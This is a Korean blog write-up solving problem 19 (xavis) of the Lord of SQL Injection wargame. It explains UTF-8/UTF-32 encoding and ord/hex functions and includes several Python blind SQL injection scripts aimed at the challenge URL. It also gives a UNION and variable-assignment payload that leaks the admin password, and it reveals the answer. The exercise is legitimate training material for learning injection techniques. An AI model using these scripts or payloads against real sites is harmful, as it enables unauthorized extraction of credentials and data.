Lord of sql injection [19]

문제 풀이에 앞서서 19번 문제는

문제 풀이과정에서 "문제를 해결한다"는 목적보다, 다른 많은 우회기법과, 그외에 많은 지식을

얻어 갈 수 있는 문제임이 분명해서, 길게 얻은 지식들을 나열해 놓았으니

해답만 보고 싶으신 분들은 바로 그냥 아래로 내려주세요.

 

---

 

 

[문제 19]

 

실제 admin의 pw와 일치 해야 해결되는 문제입니다.

like를 막고 있네요.

처음 코드를 볼땐 어? 막는게 별로 없네?! 너무 쉬운거 아닌...!?........가..?

네, 실수였고요 

 

 

일단 참일 때 hello admin을 출력시켜주니, blind sql injection으로 보고 풀건데............

음 아무리 생각해도 저 regex() 정규표현식?이 왜 막힌질 모르겠네요.

 

일단 길이를 알아내보겠습니다.

 

기존 코드에는 값이 안 담기길래 num 의 값을 늘려 준 후 코드를 실행시켜봤더니,

 

import requests
from bs4 import BeautifulSoup

query1 = "\'or length(pw)=%d #"
dbname =[]

#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

for num in range(0, 100):
    dbname = [query1 % num]
    cookies = {'PHPSESSID': '85440fct0n9jjuk00t1rdl7tpo'}
    params = {'pw': dbname}
    res = requests.get('https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php', params=params, cookies=cookies)
    code = res.text  # 전체 코드
    search = "Hello admin"  # 참일시 나오는 결과 값

    if search in code:
        print("Password Length : ",num)
        break




print("###########################완료")

 

결과는 '12' 였습니다.

 

 

 

아래 코드는  g0pher.tistory.com/m/400 

님의 블로그에서 가져온 코드입니다.

그냥 코드가 미친것 같아요....와 진짜 어떻게 이런 코드가 나오는지 제 머리로는 사실 코드 이해가 잘 

안되네요...

 

 

import requests

url = "https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php"
session = {'PHPSESSID': '85440fct0n9jjuk00t1rdl7tpo'}
data = {}

flag = ""

print("flag : ", end='')

for i in range(1, 4):
    a = 0
    b = 100000
    while b - a != 0:
        center = a + (b - a) // 2 + 1
        data['pw'] = "' or id='admin' and ord(mid(pw," + str(i) + ",1))<" + str(center) + "#"
        res = requests.get(url, params=data, cookies=session)
        if "Hello admin" in res.text:
            b = center - 1
        else:
            a = center
    print(chr(a), end='')
    flag = flag + chr(a)

data['pw'] = flag
res = requests.get(url, params=data, cookies=session)

if "Clear!" in res.text:
    print("\n XAVIS Clear!")

 

 

flag를 찾았으면 값을 넣어줍니다.

 

 

 

Clear

 

이 문제를 풀면서 와..세상에 천재가 참 많구나....

정말 어렵게 이해한 문제 였습니다..(제가 스스로 풀어보고 싶었는데 오랜 삽질 끝에도 아는 지식이 전무하다보니 어렵네요.)

푸는 것도 어렵지만 풀이를 이해하는 것도 만만치 않네요..

 

 

 

1. 삽질의 과정(ord함수와 확장 아스키코드를 알고싶다면?) 

▼ ▼ ▼

쿼리를 입력해보았더니,

 

 

hello admin이 보입니다.

 

pw를 찾기위해 이전에 쓰던 파이썬 코드를 사용해보았는데요, 

 

 

모든 값이 0 이 나왔네요.

 

혹시나 하는 마음에 확인 차 값을 넣어보았는데,

 

 

혹시 답은 000000000000 ????!?!?

 

네 아니고요;

 

 

왜 0이 나온걸지 한참 고민해봤습니다. 혹시나 하는 마음에 이전에 썼던, 어느 블로그에서 참고해서 가져온

bit연산 코드를 가져왔는데

 

 

무언가 나오기는 하네요, 비트로 연산하는 문제 인 것 같습니다.

 

그래서 넣어봤는데, 네 역시 안되네요. (맞춤형 코드는 아니니까.^^..)

 

이렇게 한 2시간 정도 삽질을 하고 결국 다른 분들의 블로그를 참고하여 

ord라는 함수까지 알게 되었는데, 결국 그 또한 해결방법이 아니였어요...;

(rubiya랑 섞여서 다른 문제인데 번호만 같은듯)

 

 

 

255까지 돌아도 값이 안뽑혀서 다른 방법을 시도해보았습니다..;;

 

일단 위 실행 코드는 이겁니다.

import requests
from bs4 import BeautifulSoup

query1 = "\' or ord(substr(pw,%d,1))= %d #"
dbname = []
password = []

word = ['\'a\'', '\'b\'', '\'c\'', '\'d\'', '\'e\'', '\'f\'', '\'g\'',
        '\'h\'', '\'i\'', '\'j\'', '\'k\'', '\'l\'', '\'m\'', '\'n\'', '\'o\'', '\'p\'', '\'q\'', '\'r\'', '\'s\'',
        '\'t\'', '\'u\'', '\'v\'', '\'w\'', '\'x\'', '\'y\'', '\'z\'', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

num = 1
while num <= 12:

    for i in range(1,256):
        dbname = [query1 % (num, i)]
        
        cookies = {'PHPSESSID': '85440fct0n9jjuk00t1rdl7tpo'}
        params = {'pw': dbname}
        res = requests.get('https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print(num,"Data : ", i)
            #print(dbname)
            break


    num = num+1

print("###########################완료")
print('pwd : ', '_'.join(password))

(위 코드는 rubiya버전 말고 이전버전 los에 19번 문제를 풀때 사용하시면 될것 같습니다.)

 

다른 분들의 해설을 보았는데 첫글자의 길이가 4 즉, 4byte이기 때문에

extbrain.tistory.com/30

namu.wiki/w/UTF-8

 

 

유니코드라고 합니다. 제가 이부분에 대해서 잘 캐치를 못했었는데 위 사이트들을 살펴보면 유니코드가

UTF-8 문서에 경우 각 문자를 1~4Byte까지 사용하므로, 한글은 한 글자당 1~4Byte에 길이가 반환되어 정확한 문자열의 길이를 알 수 없다고 합니다.

 

 

출처 : https://blog.naver.com/okopok5019/221690265566

 

 

즉, 유니코드(확장 아스키 코드)라고 하더군요.

저도 이번에 유니코드와 확장 아스키 코드의 관계를 처음 알게되었습니다.

 

 

출처 : 구글 위키 백과

 

하여튼.. ord함수에 대해 간단히 알아보겠습니다.

zkdlwnfm.tistory.com/50

[php] ASCII 관련 함수 chr, ord

위 블로그 참고해주세요.

 

>> My sql 내장함수에는 ord()함수가 존재함.

이 함수는 문자열의 가장 왼쪽 문자가 멀티바이트일 경우, 공식을 이용하여 ASCII 정수 값으로 돌려준다.

 

 

2.  이 문제의 풀이 과정

▼ ▼ ▼

이 문제는 풀이과정이 매우 다양했는데요,

대표적인 방법 두가지를 참고해서 올리려고 합니다.

 

 

방법 1) 

 

4byte * 3 = 12

길이가 12 라는건 3글자 (한글) 이라고 유추할 수 있음.

 

그렇기 때문에 hex라 예상하고 hex값으로 pw를 구해봅니다.

 

hex -> chr() 로 바꿔서 정답을 구하는거죠.

 

출처 :https://ghdwn0217.tistory.com/60

 

위와 같은 식으로 이해하시면 되겠습니다.

 

일단 제가 풀이를 보면서 풀다가 이해를 했는데요

 

이문제에서 pw길이는 총 12byte였습니다.

 

즉 4byte (utf-32) 유니코드라는 의미로 4byte의 유니코드 3글자 

즉 한글 3글자라고 추측하고 가정하여 구해보면

 

0x○○○○○○○○ => 이런형태로 4byte즉 '한글' 한글자가 나오는 겁니다.

 

hex (=16진수)는 0x00 => 1byte로 8비트 즉 한자리수당 4bit +4bit 총 8비트로 1byte를 의미하고

8개 == 4byte를 의미합니다.

 

그렇기 때문에 값이 총 8*3 = 24 글자 즉 4byte가 나오게 되는 것이죠.

 

이전 문제들의 pw같은 경우 대부분 영어 8글자 즉 '8byte' 가 대부분이였기 때문에 헷갈릴 수 있지만

유니코드, ASCII코드등 부호체계를 이해하면 쉽게 이해할 수 있는 문제 인것 같습니다.

 

이제 파이썬 코드를 수정해서

총 24길이의 hex값을 뽑아내보도록 하겠습니다.

 

 

import requests
from bs4 import BeautifulSoup

query1 = "\' or substr(hex(pw),%d,1)= %s #"
dbname = []
password = []

word = ['\'a\'', '\'b\'', '\'c\'', '\'d\'', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")


num = 1
while num <= 24:

    for src in word:
        dbname = [query1 % (num, src)]

        cookies = {'PHPSESSID': '85440fct0n9jjuk00t1rdl7tpo'}
        params = {'pw': dbname}
        res = requests.get('https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print(num,"Data : ", src)
            password += src
            break


    num = num+1


print("###########################완료")
print('pw(24) : ', ''.join(password))

 

이렇게 길이를 안다 가정하고 코드를 고쳤을 때

 

아래처럼 결과가 나오네요

즉 0000c6b0 // 0000c655 // 0000ad73

 

총 24글자 12byte 

4byte '한글' * 3글자가 맞네요

 

python 내장함수 chr(i)로 아스키(ASCII) 코드 값(16진수)을 입력받아 그 코드에 해당하는

문자를 출력해보겠습니다. 16진수이므로, 0x를 붙여줍니다.

 

정답 : '우왕굳' 이 나오네요. 확장형?인것인지 앞에 0000이 굳이 안붙어도 되는데 붙어있어요

이게 utf-32형식으로 저는 이해했습니다.

 

 

일단 첫번째 방법으로 정답 획득 

 

Clear

 

 

방법 2)

 

이 방법은 너무 신박하고 처음 보는 방법이라, 보자마자 정말

와.. 강력하다 느꼈습니다.

 

이 방법은 

dorahee.tistory.com/132

los - xavis

이 블로그 아래 부분의 내용을 확인해주세요. (아래는 블로그 참고 후 남긴 것입니다.)

 

---

 

SELECT @a: =pw FROM prob_xavis 

이렇게 위와 같이 쿼리를 작성했을 경우

prob_xavis 테이블에 있는 pw 컬럼 값을 @a에 넣으라는 뜻이다.

 

원래 변수 안에 값을 넣는 것 자체는 false를 의미하지만

결과 값은 출력이 된다고 한다.

 

pw=%27%20or%20(select%20@a:=pw%20where%20id%20=%20%27admin%27)%20union%20select%20@a--%20

 

패스워드 뒤 쿼리는 위와 같다.

' or (select @a:=pw where id = 'admin') union select @a-- 

꼭 -- 를 하고 나서 %20 즉 스페이스를 해주어야 실행이 된다.

 

결과는

 

 

와..진짜 이런쿼리는 난생 처음본다..(;)

 

or로 pw를 이어서 값을 참으로 만들고, (원래 값은 false니까, 뒤에 union 으로 @a-- 를 준 것 같음)

출력을 해낸다. union으로 앞에 출력문 hello + 우왕굳 ( id = admin의 pw값)

을 함께 출력시켜서 이 값을 알아낸 후 

pw =우왕굳 을 해주면

 

문제 Clear

 

 

 

 

3. 참고하면 좋을 사이트

▼ ▼ ▼

dingue.tistory.com/16

아스키 코드, 유니코드 그리고 UTF-8, UTF-16

dorahee.tistory.com/132

los - xavis

whitesnake1004.tistory.com/124

[Lord of SQL_injection] #19 xavis

 

 

이상입니다.. 와 문제 완벽히 이해하는데 2일 걸렸어요..^^...

더 열심히 해야겠네요....